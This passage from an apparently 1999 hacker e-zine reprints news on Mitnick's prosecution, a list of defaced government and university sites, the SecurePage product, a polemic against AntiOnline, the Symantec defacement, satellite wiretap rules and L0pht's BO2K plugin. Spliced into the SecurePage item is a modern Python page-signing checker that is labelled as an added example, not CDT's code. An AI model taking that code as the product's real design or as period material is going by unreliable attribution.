     not trumpeting the arrest of the century when the suspect is a kid on
     a laptop,'' Randolph said.

     Mitnick's prosecutors insist they have not overreached, that Mitnick
     caused millions in damage by stealing and changing information in
     computer systems.

     ``This is someone whose conduct over a 2-year period was very
     broad and very serious,'' Assistant U.S. Attorney Christopher Painter
     said. ``He hit a huge number of companies with a lot of damage. He
     is not the victim.''

     If Mitnick does win his freedom soon, it could be short-lived. The Los
     Angeles County District Attorney's Office is preparing its own case
     against him on charges similar to the federal claim.

     Randolph said he's confident Mitnick, in the end, will prevail.

     ``In 1995, the press and the public were fooled into thinking Kevin
     Mitnick was this cyber bogeyman,'' he said. ``That type of argument
     doesn't fly in 1999. People know better.''

     Sites that have been targeted

     Here's a partial list of Web sites that have been attacked in recent
     months. In most cases, the sites were defaced. In others, a flood of
     requests for service overwhelmed Web servers, rendering them
     unusable. In several of the attacks, the intruders called the acts
     revenge for FBI ``harassment'' of hackers.

      Bell South

      eBay (on-line auctioneer)

      FBI

      Fort Monmouth (N.J.) U.S. Army Garrison

      Georgetown University

      Harvard University

      Idaho National Engineering and Environmental Laboratory (conducts
     research for the U.S. Department of Energy)

      Illinois Comptroller's Office

      NASA Goddard Space Flight Center

      National Oceanic and Atmospheric Administration Storm Prediction
     Center

      State of Virginia home page

      University of California-Davis

      University of Colorado

      University of Michigan

      University of Wisconsin

      U.S. Army main Web site

      U.S. Coast Guard

      U.S. Department of Agriculture

      U.S. Department of Education

      U.S. Department of the Interior

      U.S. Department of Labor

      U.S. Information Agency

      U.S. Navy

      U.S. Senate (twice)

      The White House 

      @HWA
    
13.0 IIS Server 'hackproof'? 
     ~~~~~~~~~~~~~~~~~~~~~~~ 

      contributed by Code Kid 
      A small company in Sydney, Australia, called Creative
      Digital Technology, has claimed to have created
      software that will make web pages on IIS Servers 'hack
      proof'. The software, known as SecurePage, digitally
      signs all pages and then compares those signatures
      against encrypted master copies. If the signature
      changes then the web server will stop serving the page.
      They have issued a challenge to get people to try and
      break the system, however, the information on the
      challenge is difficult to find. 

      The Australian
      http://technology.news.com.au/techno/4108922.htm
      
      Internet News
      http://www.internetnews.com/intl-news/article/0,1087,6_174011,00.html
      
      
      Creative Digital Technology    
      http://www.creative.com.au/
      
      Developer issues hacker challenge
      By JENNIFER FORESHEW
    
      3aug99
    
      A SMALL Sydney company that has developed software designed to
      make Web sites hack-proof, has thrown out a challenge to crack the
      technology. 
    
      Creative Digital Technology (CDT) has developed software which, when
      downloaded, makes a site secure. 
    
      "We are prepared to stand behind that financially by offering a prize to
      universities to see if they can do what our developers haven't been
      able to do," CDT chief operating officer Philip Burton said. 
    
      CDT, which developed the country's first SET (Secure Electronic
      Transaction) enabled products, is launching the SecurePage product at
      Internet World 99 this week. 
    
      "We can protect any Web site," CDT chief executive Bahram Boutorabi
      said. "The first version of the product runs on Microsoft's Internet
      Information Server platform, but we are planning to roll out across all
      platforms." 
    
      Mr Boutorabi, who is also technology officer, said many sites could be
      hacked because they were developed using mostly straight text. 
    
      "We have developed the technology to put something into Active
      Server Pages, HTML, Net Commerce Mark-up Language and XML, which
      represents a signature that someone has made against that page," Mr
      Boutorabi said. 
    
      Any attempt to alter a Web site's content would result in action being
      taken by the system, which is protected by 192-bit, Triple-DES
      encryption. 
    
      "If the contents of that page have been altered for any reason it will
      stop serving that content out and serve it from its own content area,
      where everything is fully encrypted," Mr Boutorabi said. 
    
      "SecurePage enables an administrator to put a disc into the system, run
      the administration and tell it to sign all of the pages with their
      password. 
    
      "To alter the code or text, you have to have administrative access to
      change the content or to stop the system." 
    
      Mr Burton, who is also a senior partner in CDT, said the company began
      working on the technology after attacks on high-profile Web sites. 
    
      "This came about from evidence that significant Web sites were being
      hacked and destroyed. 
    
      "We believed we could deliver a protection device in software form that
      could be downloaded from our Web site by whoever was hosting that
      particular site." 
    
      CDT declined to reveal further details of the technology pending
      approval of a patent on SecurePage. 
    
      If you decide to take up CDT's challenge to crack its software,
      Computers & High Technology wants to know. E-mail us at
      auscomp@ozemail.com.au - but only if you are successful. 

      
      Internet News
      http://www.internetnews.com/intl-news/article/0,1087,6_174011,00.html
      
      

      Australian Web Innovations Debut at IW Sydney 
      August 4, 1999
      By Gerard Knapp
      InternetNews.com Australian Correspondent 


      [Sydney, AUSTRALIA] Several Australian companies have used the Internet World Australia 99 exhibition to launch new
      products. 

      Sydney-based startup Pure Commerce has introduced Pure Global Pay, a payment gateway service which can accept 32 different
      currencies without merchants needing to establish relationships with non-Australian banks. 

      E-commerce developer Creative Digital Technology is debuting two software applications: a wallet which supports the Secure
      Electronic Transactions (SET) standard for e-commerce transactions called ActiveWallet, and a solution for attempts by hackers to
      deface corporate Web sites called SecurePage. 

      The ActiveWallet client is an 850KB client-side applet which enables consumers to pay bills and buy products using credit cards in
      a drag and drop environment. The client is designed to support transactions using the SET-certified merchant server technology of
      US-based GlobeSet. 

      SecurePage attaches digital signatures to static Web pages and dynamically generated components so that they can be compared
      against an encrypted master version to check if they have been altered by malicious hackers. 

      Allaire has also used Internet World as its Australian launch for Spectra, its Web content management product. 

      The show has also coincided with the announcement that US-based analyst firm Jupiter Communications had filed preliminary
      documents for an IPO. Wednesday keynote speaker Gene De Rose, who is CEO and 21.8 per cent stake holder of Jupiter, is
      poised to become the next Internet multi-millionaire. 

      The Internet World 99 Best of Show product awards, judged by journalists at Internet World Australia magazine, will be
      announced on Wednesday.
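
      The check both articles above describe (sign each page, compare the live
      copy against a protected master, serve the master when they differ), as an
      added example that is not CDT's code or part of either article. It assumes
      an HMAC-SHA256 tag keyed from the administrator's password in place of
      SecurePage's undisclosed signature scheme, and holds the master copies in
      memory instead of a Triple-DES encrypted store; PageGuard, derive_key and
      tag are hypothetical names.

```python
import hashlib
import hmac
import tempfile
from pathlib import Path

PBKDF2_ROUNDS = 200_000  # constructed work factor for this example


def derive_key(password: str, salt: bytes) -> bytes:
    """Turn the administrator's password into a fixed-length MAC key."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def tag(key: bytes, rel_path: str, content: bytes) -> bytes:
    # The path is part of the tagged message, so one validly signed page
    # cannot be copied over another page without the tag changing.
    return hmac.new(key, rel_path.encode() + b"\0" + content, hashlib.sha256).digest()


class PageGuard:
    """Serve a page only while its live bytes still match the signed master."""

    def __init__(self, web_root, key: bytes):
        self.web_root = Path(web_root).resolve()
        self._key = key
        self._masters = {}  # rel_path -> (tag, master bytes); assumed protected storage
        self.alerts = []    # paths whose live copy failed verification

    def sign_all(self) -> int:
        """Administrator step: record a tag and a master copy for every page."""
        for p in sorted(self.web_root.rglob("*")):
            if p.is_file():
                rel = p.relative_to(self.web_root).as_posix()
                data = p.read_bytes()
                self._masters[rel] = (tag(self._key, rel, data), data)
        return len(self._masters)

    def serve(self, rel_path: str):
        """Return (status, body): 'live', 'master' or 'refused'."""
        entry = self._masters.get(rel_path)
        if entry is None:
            # Only paths recorded at signing time are ever opened, so files
            # dropped later and '../' style requests are refused outright.
            return ("refused", b"")
        expected, master = entry
        try:
            live = (self.web_root / rel_path).read_bytes()
        except OSError:
            live = None  # deleted or unreadable counts as tampering
        if live is not None and hmac.compare_digest(tag(self._key, rel_path, live), expected):
            return ("live", live)
        self.alerts.append(rel_path)
        return ("master", master)


def demo():
    """Constructed web root: one clean read, one defacement, one drop, one delete."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.html").write_bytes(b"<h1>Welcome</h1>")
        (root / "about.html").write_bytes(b"<h1>About</h1>")
        key = derive_key("constructed-admin-password", b"constructed-salt")
        guard = PageGuard(root, key)
        guard.sign_all()
        results = {"clean": guard.serve("index.html")}
        (root / "index.html").write_bytes(b"<h1>defaced</h1>")
        results["defaced"] = guard.serve("index.html")
        (root / "new.html").write_bytes(b"unsigned")
        results["unsigned"] = guard.serve("new.html")
        (root / "about.html").unlink()
        results["deleted"] = guard.serve("about.html")
        results["alerts"] = list(guard.alerts)
        return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

      Anyone who can read the key or rewrite the master store can re-sign
      altered pages, which is the administrative-access boundary the article
      mentions, so both belong outside anything the web server account can write.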

      
      
     
14.0 Latest CWD Pokes at AntiOnline 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      The CyberWire Dispatch, a mailing list newsletter, has
      some very interesting things to say about John
      Vranesevich and AntiOnline. CWD writer Lewis Z. Koch
      makes some powerful observations about his past
      dealings with and the writings of Mr. Vranesevich. (If
      you have been following the antics of AntiOnline at all
      this is a must read piece.) 

      CyberWire Dispatch- republished with permission     
      
      Note: CyberWire Dispatch is a mailing list only newsletter.
      It is reprinted here with permission. Subscription
      information is at the end. 



      CyberWire Dispatch // August 1999
      // All Rights Reserved

      Jacking in from the "Pine-Sol" port:
      By Lewis Z. Koch
      CWD Special Correspondent

      Twenty-year-old John Vranesevich calls his AntiOnline
      Web site "a valuable tool in the fight against 'CyberCrime.'"
      In a call to arms, this self-anointed, junior G-man
      wannabe, promises to uncover, reveal and inform on
      hackers and other miscreants. 

      Out of this misguided cyber-vigilantism, arises the
      "denunciator" virus, which reaches its full lethality in
      totalitarian states but also finds a home in democratic
      societies as well, usually in climates of social resentment,
      political fanaticism, or, my personal favorite, political
      self-righteousness.

      The Denunciator virus, known also as the "Accuser" virus,
      destroys careers, leaves permanent scars, called
      "blacklists," gives rise to false alarms, warnings or
      contrived "cautionary tales" meant to lull or divert
      citizens. The natural host for this virus is believed to be a
      species of the rodent called a "snitch," aka squealer, stool
      pigeon, informer; rat bastard.

      Every delusional crusader needs a mission statement,
      Vranesevich is no different. This self-anointed
      sheriff-of-cyberspace pens this Uber-warning to hackers:

      "I know that some of you are playing what you feel is a
      game. A game that you think you are winning. Some of
      you sit back and laugh at organizations like the FBI. You
      make sure that you provide enough information to make it
      obvious who you are, yet are careful not to provide
      enough information to actually have it proven. I have
      been watching you these past 5 years. I know how you
      do the things you do, why you do the things you do, and I
      know who you are."

      And if you're keeping score-and you should be-you'll note
      that Vranesevich apparently started down this crusader
      road at the tender age of 15 or just about the time he
      figured his Johnson could be used for more than simple
      utilitarian bodily functions. 

      This not-very subtle paean to cyber-vigilantism could
      easily be dismissed save for the fact that Vranesevich
      has earned a demi-celebrity status from journalists
      working for publications from which we have come to
      expect more judicious sourcing, including, but not limited
      to, Matt Richtel of The New York Times, John Schwartz of
      The Washington Post and even, sadly, CWD's own Brock
      Meeks while cloaked in his alter-ego as Washington
      correspondent for MSNBC.

      And we wonder why fewer and fewer people trust the
      media.

      Hung With His Own Rope
      =====================

      In his mission statement Vranesevich unequivocally
      states, "I've seen myself talking with people who have
      broken into hundreds of governmental servers, stolen
      sensitive data from military sites, broken into atomic
      research centers."

      Question is, can we believe him?

      There's his rather perplexing story about hackers breaking
      into an "Israeli" atomic research center. 

      At first, as Vranesevich tells it, when hackers told him
      what they had done, he "freaked" even thought the boast
      might be "far fetched." But these hackers sent him a
      "folder full of documents written in a foreign language"
      they claimed they had copied from the "B'Hadvah" Atomic
      Research Center. [Note: Vranesevich didn't know how to
      spell the name of the so-called research center].

      "Were the documents in Hebrew or English?" I asked.

      "Bengali."

      When he broke the "story" on his AntiOnline web site, all
      media hell broke loose. 

      "Every mainstream media started calling and questioning
      and calling the research center," Vranesevich said. "I had
      all these nuclear arms proliferation people calling. Here I
      am in my parent's living room, and one day, thirteen calls
      from anti-nuclear proliferation and pro-nuclear proliferation
      (sic) groups wanting to know - is this significant, what is
      Israel doing?"

      I was still having a problem with the "Bengali" aspect to
      the documents.

      "Ah, John," I asked, "is this an Israeli research center or
      could it be Indian? Pakistani?"

      Silence. Then Vranesevich said, "I think it's Indian. Who
      was the one that just did the nuclear testing?"

      "That was India and Pakistan, not Israel."

      "Oh, then this was India, not Israel."

      Oh. 

      Then there's his story about changing medical
      records-pretty serious stuff. Can we take him at his word
      there?

      "[I]'ve seen people change the medical records of
      individuals in our armed services" Vranesevich asserts in
      his "mission" statement. 

      When asked about these nefarious deeds, Vranesevich
      works himself up into a high dudgeon about hackers
      breaking into sites and changing medical records.

      "What would have happened if medical records had been
      changed and a cancer patient received the wrong
      treatment for it?...What if I had looked into who these
      [hacker] guys were, a little further? What would have
      happened if I would have published the story? What would
      have happened if CERT had come out and said medical
      records had been changed and a cancer patient received
      the wrong treatment because of it!" 

      I questioned him closely. "You really saw people change
      the medical records of individuals in our armed forces?" 

      "I don't mean that literally," backtracking as fast as his
      voice could carry him. "You see the language I was using?
      I don't mean literally 'I saw them do it, I saw it happen.'
      It's something that transgressed (sic) before. It's like we
      saw our country go through three wars. It doesn't mean I
      caused (sic) the three wars. You see what I'm saying? Or
      I've seen crime happen over and over again in my
      neighborhood. Doesn't mean I literally saw it. You know
      what I mean? I don't know if I'm making myself clear." Ah,
      er.. right. He gave it one more chance.

      "Looking back in retrospect (sic). It was like actions that
      transgressed (sic) before. I've sort of watched the events
      transfold (sic) before my eyes."

      Yep, that clears it up; someone get this guy an English
      tutor...There's more like that but after a while it gets,
      well, boring.

      Vranesevich also claims a "semi-contractual" relationship
      with all kinds of official military and police types, including
      one with the NASA and one with the Defense Information
      Systems Agency (DISA). 

      Can we believe him? 

      NASA says no. After checking with their databases "they
      could find no record of NASA having done business with
      Mr. Vranesevich or his company AntiOnline," reports
      Patricia M. Riep-Dice, NASA Freedom of Information Act
      Officer. 

      According to a DISA spokesman, no such relationship
      exists. None. Nada.

      In Other People's Words
      =======================

      In his grasp for distinction, celebrityhood, acclaim,
      Vranesevich overreaches, as he did with his claim of
      unethical behavior on the part of computer security expert
      Marcus Ranum. Ranum's "crime"? "Guilt-by-association"
      with two hacker groups, L0pht Heavy Industries and cult
      of the Dead cow (cDc).

      L0pht Heavy Industries is among the finest Microsoft
      error-catchers in the world; it is a company with
      employees and it pays taxes. "cult of the Dead cow" is a
      group of hackers in the tradition of Yippie founders Abbie
      "Steal This Book" Hoffman and Jerry Rubin.

      The cDc promises Internet chaos, anarchy and terror; in
      1968, in Chicago, Abbie Hoffman and Jerry Rubin
      threatened to pour LSD in the water and send Yippie
      studs to O'Hare airport to seduce the wives of delegates
      to the Democratic National Convention. If that analogy is
      lost on you, cut your losses now, stop reading and return
      to your "Internet for Dummies" workbook.

      L0pht and cDc tend to despise Microsoft, but then so do a
      lot of people, including folks in the Justice Department.
      More than likely there is cross-over contact between
      L0pht and cDc since the two have much in common, in
      the same way journalists from different newspapers and
      television tend to hang out at the same bars, buy each
      other drinks and complain about stupidity and venality of
      their editors.

      cDc had been tinkering around the multiplicity of holes,
      vulnerabilities and general screw ups in the Microsoft
      Windows operating system. They developed a
      back-dooring program for Win 95, one that allowed a
      Trojan Horse to exploit that vulnerability. 

      In a stroke of genius that would make a Wizard of
      Madison Avenue green with envy, they dubbed the
      program "Back Orifice." 

      Ranum developed a program to counteract Back Orifice
      and called it "Back Officer Friendly." Vranesevich claims he
      was "shocked, shocked" to discover that Ranum might
      have had conversations with hackers at L0pht, perhaps
      even some at cDc about Back Officer Friendly.

      Vranesevich's story alleged that Ranum could have even
      been talking with the very people at cDc who developed
      the exploit in the first place. So what do we have here?
      Collusion? Duplicity? Ethical lapse? Double-agentry?

      Whom to believe?
      ================

      Bell Labs' William R. Cheswick, co-author with Steven
      Bellovin of the exemplary "Firewalls and Internet Security -
      Repelling the Wily Hacker," says of Ranum: "I have worked
      with Marcus for years. He is a strong force for Good
      against Evil. A security person is paid to think bad
      thoughts, and Marcus is quite good at it. The key is that
      he doesn't do the bad stuff, but uses this approach to
      make things safer." 

      Bellovin, himself a world-class computer expert, certainly
      doesn't equivocate. Ranum has "been a strong, positive
      force for Internet security, both in the sense of building
      useful tools and in the sense of teaching other people
      important principles. I've also never heard any serious
      question about his ethics." 

      "Marcus has one of the most fluent understandings of
      Internet security I have ever seen," says Bruce Schneier,
      whose books on encryption and on privacy can trigger a
      physical and intellectual hernia, "his ability to see threats
      and attacks, defenses and countermeasures, makes him
      one of the most valuable resources we have in computer
      security world," Schneier said. Marcus' "association with
      the L0pht recognizes that there is considerable expertise
      in the hacking community that can be leveraged in the
      fight against computer crime. Marcus is just smarter than
      other people, because he realized it and figured out how
      to use it. No kidding; he's that good." 

      So you do the math: self appointed cybervigilante John
      Vranesevich, with his stolen "Israeli" atomic secrets
      written in Bengali, changed medical records that weren't
      changed, unsubstantiated relationships with NASA and
      DISA (and that's just for openers), and, on the other
      hand, Marcus Ranum and people like Cheswick, Bellovin,
      and Schneier.

      The best way to deal with "Denunciator" virus is simply
      silence; don't feed the hype. 

      ========================================

      EDITOR'S NOTE: CyberWire Dispatch, with an Internet
      circulation estimated at more than [500,000], is now
      developing plans for a once-a-week e-mail publication.
      Every week, one of five well-known investigative reporters
      will file for CWD. If you think your company or organization
      would be interested in more information about establishing
      a sponsorship relationship with CyberWire Dispatch,
      please contact Lewis Z. Koch at lzkoch@wwa.com.

      ===================

      To subscribe to CWD, send a message to:

      Majordomo@vorlon.mit.edu

      No subject needed.

      In the first line of the message put:

      Subscribe CWD

      To remove yourself from this list, send a message to:

      Majordomo@vorlon.mit.edu

      No subject needed.

      In the first line of the message put:

      Unsubscribe CWD

      ---- 

      @HWA
      
15.0 High Profile Sites Defaced 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~  
     
     From HNN http://www.hackernews.com/

      contributed by TurTleX 
      The Jerry Springer Show, Symantec Corporation and
      even Nellis Air Force Base have all had their pages
      defaced in recent days. The defaced Symantec page
      claimed to have left a trojan/worm behind that infected
      all of Symantec's systems. Symantec denies the charge.
      Thanks to attrition.org we were able to grab mirrors of
      the affected sites. 

      HNN Cracked Pages Archive 
      http://www.hackernews.com/archive/crackarch.html
      BBC
      http://news.bbc.co.uk/hi/english/sci/tech/newsid_409000/409980.stm
      C | Net
      http://www.techweb.com/wire/story/TWB19990802S0002
      Wired
      http://www.wired.com/news/news/technology/story/21052.html
      ZD Net
      http://www.zdnet.com/zdnn/stories/news/0,4586,2307804,00.html
      Heise Online- German      
      http://www.heise.de/newsticker/data/fr-02.08.99-001/
      
      ZDNet;
      
     --------------------------------------------------------------
     This story was printed from ZDNN,
     located at http://www.zdnet.com/zdnn.
     --------------------------------------------------------------
     
     Symantec: Vandals didn't infect us
     By Robert Lemos, ZDNN
     August 2, 1999 2:02 PM PT
     URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2307804,00.html
     
     Internet vandals broke into the servers of network security and utilities firm Symantec Corp.
     Monday morning, defacing the company's Web site. 
     
     While the vandals claimed to have infected Symantec's network two months ago with a worm,
     quaintly dubbed Bloworm, the company denied Monday that any worm existed on its systems. 
     
     "There is no virus infection, no worm infection, and no danger to customers," said Richard
     Saunders, a spokesman for the Cupertino, Calif., company. 
     
     "They didn't get in beyond posting a mildly offensive, but otherwise impotent, message on our
     home page." 
     
     The five cyber vandals, who identified themselves only by their handles, claimed otherwise. "0ur
     w0rm iz spreading around (Symantec's) netw0rk and infecting (it's) f1lez, since about 2 months
     ago. phear," stated the group in a document of typically spelling-impaired hacker-speak. The
     document was left behind by the group after it broke into the servers of Symantec at about 5 a.m.
     PT Monday. 
     
     Worms are virus-like programs that infect systems through networks automatically and without the
     need for an unknowing user to open a file or run an application. 
     
     Symantec (Nasdaq:SYMC) has always been a popular target for Internet vandals looking for a
     hard nut to crack. The only difference: This time someone actually got in. 
     
     "What this incident does show is that you cannot be complacent towards this kind of threat," said
     Saunders. The Symantec spokesman could not detail how the cyber vandals entered the
     company's network. 
     
     Symantec engineers took down the page within an hour of its posting, but not before the media in
     Europe got wind of the defacement. The BBC posted a story early Monday morning. 
      
     @HWA
     
16.0 Off The Hook Goes Shortwave 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
     
      From HNN http://www.hackernews.com/

      contributed by Emmanuel 
      Adding to its impressive list of distribution methods "Off
      the Hook" now broadcasts on shortwave radio. "Off the
      Hook" is a weekly radio show dedicated to the issues
      and events of the hacker world. Not only is "Off The
      Hook" available via commercial broadcast radio, Real
      Audio and MP3, they will now be broadcasting on
      shortwave radio as well. You can listen in at 7415 kHz,
      Tuesdays at 8 pm EST. 

      Off The Hook            
      http://www.2600.com/offthehook/
      
      @HWA
      
17.0 Feds Stop Satellite Biz due to WireTaps 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      From HNN http://www.hackernews.com/

      contributed by Code Kid 
      The Federal Communications Commission is holding up
      critical operating licenses for several small satellite
      phone companies until they have finished talking with
      the FBI. The CALEA Act passed in 1994 requires
      telephone companies to provide law enforcement with
      access to digital call information, including the ability to
      tap calls and determine the location of users. Several
      satellite phone companies are in long negotiations with the
      FBI to ensure that their systems comply with the law. 

      C | Net
      http://www.news.com/News/Item/0,4,40048,00.html?st.ne.fd.gif.e
      
      FBI wiretap worries slow satellite phones 
      By John Borland
      Staff Writer, CNET News.com 
      August 3, 1999, 4 a.m. PT 
      URL: http://www.news.com/News/Item/0,4,40048,00.html 
      
      The Federal Bureau of Investigation is putting the brakes--at least temporarily--on the satellite phone industry. 
      
      The FBI and other U.S. law enforcement agencies are worried that new space-based telephone systems, which theoretically allow a person to use a wireless phone
      from virtually anywhere on earth, will undermine their ability to wiretap telephone calls and trace criminals through cellphones. 
      
      Federal communications officials are holding up critical operating licenses for Globalstar and a handful of smaller satellite phone services while they negotiate with the
      FBI over wiretapping issues. 
      
      "These are borderless systems," said Mac Jeffery, a spokesman for Globalstar, a satellite phone provider scheduled to launch service in North America by the end of
      this year. "But it's not really a borderless world from the legal perspective yet." 
      
      Globalstar, Iridium, and a handful of other companies are leading an ambitious push to create a network of satellites that compete with traditional cellular phone
      service. The industry has already run into growing pains--Iridium, the first and largest system to launch, has run into severe financial difficulties after falling short of
      subscriber goals. 
      
      The wiretapping issue affects these companies and a handful of other non U.S.-based smaller satellite phone providers which are seeking licenses to operate in the
      United States, but have land-based equipment located in Canada. 
      
      A 1994 U.S. law, dubbed the Communications Assistance for Law Enforcement Act (CALEA), requires telephone companies to provide law enforcement with
      access to digital call information, including the ability to tap calls and determine the location of users. 
      
      That law has proven controversial. Privacy rights groups have protested that the FBI is encroaching on citizens' rights in their push to tap phone calls. Meanwhile, the
      FBI has said that industry proposals for following the law don't go far enough. The Federal Communications Commission has yet to make a final ruling on the laws. 
      
      The FBI's concerns with satellite phone providers do include figuring out how they fit into this law's framework, said one department official. But the Bureau's
      concerns are larger and more immediate, which has led to the current delay in licensing the services. 
      
      Some of these satellite systems are unable to provide information on a caller's location. This information is critical for law enforcement, the FBI says, so it can know
      whether or not it can legally seek a U.S. court order to tap the phone calls. 
      
      Canada's TMI Communications, which has seen its U.S. license application languish in the FCC for close to 16 months, faces this objection. Department of Justice
      officials are reportedly asking the company to include some kind of global positioning system in TMI phones that would at least determine which country a caller was
      in. 
      
      TMI executives confirmed that they are discussing possible ways to solve the dilemma with U.S. law enforcement officials, but would not comment further. 
      
      Because its system is configured differently, Globalstar doesn't face this issue. But because it wants to set up two of its four land-based receiving stations in Canada,
      it is in a different--and perhaps more technically challenging--situation. 
      
      The FBI is concerned that it would have to go through Canadian government officials to win a wiretap on any calls going through these stations--an idea it strongly
      opposes. Allowing information about surveillance operations to go through foreign government channels would be a serious violation of national security, one FBI
      official said. 
      
      All the companies involved are negotiating these issues with the FBI, and have each proposed a series of technical and policy solutions to the problem unique to their
      own networks. But according to Washington sources, senior trade and law enforcement officials from Canada and the United States have also discussed the
      problem, with an eye to settling national security concerns on a policy level with a minimum impact on industry development. 
      
      Meanwhile, the FCC is waiting and watching. The FBI and the Department of Justice have no official power to hold up the companies' operating licenses, but
      regulators are waiting for a resolution to the talks anyway. 
      
      "The parties are discussing this," said one FCC official, who asked to remain anonymous. "In the absence of indications that this is not moving forward, we would
      like to give that process a chance to work." 
      
      The dispute is similar to the fight being waged by U.S. software companies, who are barred from exporting strong encryption programs overseas. The FBI has
      lobbied to bar these exports--and has advocated for stricter rules governing use of encryption inside the United States--arguing that law enforcement needs to be
      able to crack encryption on encoded email messages of criminals and terrorists. 
      
      As with the software companies, the satellite firms are taking a conciliatory stance, hoping to get federal approval before the issue begins cutting into their official
      launch date. Globalstar, which is slated to go live in North America by the end of this year, says it doesn't expect the issue to push that date back. 
      
      "Obviously some modifications are going to be made in order to make sure that national security is intact," said Andy Radlow, a spokesman for Vodafone AirTouch,
      the company handling Globalstar's North American business. "But we don't foresee launch delays."       
      
      @HWA
      
18.0 InfoCriminals Should Face Reasonable Penalties 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
      
      From HNN http://www.hackernews.com/
      
      contributed by Weld Pond 
      
      A very interesting opinion piece in Sunday's San Jose
      Mercury News asks some very poignant questions. The
      article calls for reasonable sentences for InfoCriminals,
      methods to be developed so that they are caught and
      says that companies should be held just as responsible
      as InfoCriminals for security violations. (This is the first
      time I have seen the word "InfoCriminals" used. I like
      it.) 

      San Jose Mercury News
      http://www7.mercurycenter.com/premium/business/docs/hotbutton01.htm
      
      
 
      Published Sunday, August 1, 1999, in the San Jose Mercury News 
 
      Companies should be required to have their information security
      systems audited on a regular basis, says Steph Marr, vice president
      of Predictive Systems Inc.'s information security practice in Santa
      Cruz.
 
      Setting the trap for hackers
      A truly rational criminal system would provide
      near-certainty that transgressors would be caught -- and
      punish companies with lax security
 
      BY STEPH MARR
 
      THE recent spate of viruses has put us back on red alert -- the bad
      boys are still out there. And if they're caught, like David L. Smith, the
      alleged father of ``Melissa,'' they may face ridiculously high penalties
      -- penalties that are way out of line with their actual threat to society. 
 
      However, these penalties are necessary in order to establish some
      semblance of deterrence, because the probability of getting caught is
      near zero. We need to increase that probability. 
 
      Here's a formula that explains why we seem unable to stop hackers
      and other computer criminals: The value of a crime equals the penalty
      times the risk of getting caught. 
 
      The concept is simple. If the value of the ``prize'' is higher than the
      penalty multiplied by the risk of getting caught, most hackers will go
      for it. For example, if a hacker breaks into a bank's server and steals
      $1 million and the penalty for the crime is 10 years, it's worth it if the
      risk of getting caught is near zero. You do the math.
 
      A truly rational criminal system would provide near-certainty that
      transgressors would be caught. When caught, they would receive a
      penalty that is precisely commensurate with their crime. 
 
      For example, if a hacker breaks into a bank's computer and steals $1
      million, that's bank robbery. There are currently laws that address
      bank robbery and the penalties that apply. Similarly, if hacking occurs
      over state lines, wouldn't that constitute interstate transportation of
      stolen property? My point is that rather than apply grossly overstated
      penalties to an InfoCrime, we should simply apply the penalties
      already established for ``real world'' parallels. 
 
      But this only works if the criminals are likely to be caught -- which is
      not where we are today. In recent years, few InfoCriminals have been
      caught and punished. To address this, we need responsible parties --
      such as the government, private institutions and computer vendors --
      to introduce greater risk into the hacker equation. 
 
      The first step would be to encourage better record keeping of who
      does what, and when. For example, handling virus problems could be
      comparatively easy if we refused to run ``anonymous'' programs.
      Microsoft has built this ability into its browser, as have others. It's a
      simple matter to set the system to refuse to run code that doesn't have
      a known source. 
 
      Furthermore, we need to foster a system whereby critical information,
      such as medical or financial records, simply cannot be accessed
      without a clear record of precisely who did what and when. 
 
      This is the responsibility of the medical or the financial communities.
      We need legislation to require these organizations to take strong
      measures to protect information kept about us, or for us. Some
      information may be collected as a normal part of transacting business
      with any organization, but limits on the use of that information need to
      be in place. 
 
      It is the responsibility of businesses and institutions to safeguard the
      information we give them. If they fail to do so, they should be
      penalized, along with the hackers. If a high-school student can crack
      the Pentagon, then both the student and the Pentagon should be held
      accountable. If the Pentagon can't defend against our own students,
      how are they ever going to stand up to a true InfoWar from a foreign
      government? 
 
      Companies should be required to have their information security
      systems audited on a regular basis, just as they have their books
      audited. And, just as incorrect bookkeeping can lead to civil and
      criminal penalties, so too should information security errors. 
 
      For example, if it can be proved that a company could easily have
      done a better job of security, the company itself -- in addition, of
      course, to the hacker -- should be punished. Fines could be collected
      from the company to compensate those people whose information
      was lost or stolen. This is the only way we can make information
      security -- and the safety of our private information -- a standard
      business practice.
 
      We need the vendors of consumer products to be held accountable
      for the products they create. If Intuit is going to be in the business of
      selling consumer financial management software, it should be
      responsible for building in the safeguards and the protections that are
      appropriate for that information. If Microsoft is going to be in the
      business of selling consumer operating systems, it should be
      responsible for providing an environment which is robust, free from
      known defects and protects consumer information, by default. Users
      should be free to accept additional risks, but it should be informed
      consent. 
 
      Responsible software and responsible institutions would eliminate
      hacking without risk. Then we can move on to creating realistic
      penalties for InfoCrimes. 
       
      @HWA
      
19.0 L0pht Professional Plugin Pack For BO2K 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      From HNN http://www.hackernews.com/
      
      contributed by Megan A. Haquer 
      L0pht Heavy Industries has announced that they are
      developing a line of professional plugins for the robust
      remote administration tool BO2K. The first of these
      plugins BOTOOL was released yesterday. BOTOOL allows
      the administrator to remotely manage files and the
      remote registry. This allows you to upload and download
      files securely, as well as copy, rename and delete files
      and directories. The remote registry editor allows you
      full registry editing capabilities over the BO2K secure
      command channel. 

      L0pht Heavy Industries      
      http://www.l0pht.com/
      
      --------------------------------------------------------------
      This story was printed from ZDNN,
      located at http://www.zdnet.com/zdnn.
      --------------------------------------------------------------

      L0pht releases first BO2K plug-in
      By Robert Lemos, ZDNN
      August 4, 1999 2:38 PM PT
      URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2309393,00.html

      The controversial Back Orifice 2000 has some company. 

      On Tuesday, the white-hat hacking think-tank L0pht Heavy Industries posted its first of
      three plug-ins for the program, which has been alternately called a remote administration 
      application or a hacking tool, depending on the user's point of view. 

      Called BOTOOL, the program allows users to perform point-and-click file transfers and 
      registry editing. The L0pht intends to release at least two more plug-ins: BOPEEP and BOSCRIPT. 

      Back Orifice (BO2K), whose name spoofs that of Microsoft Corp.'s (Nasdaq:MSFT) Back Office, 
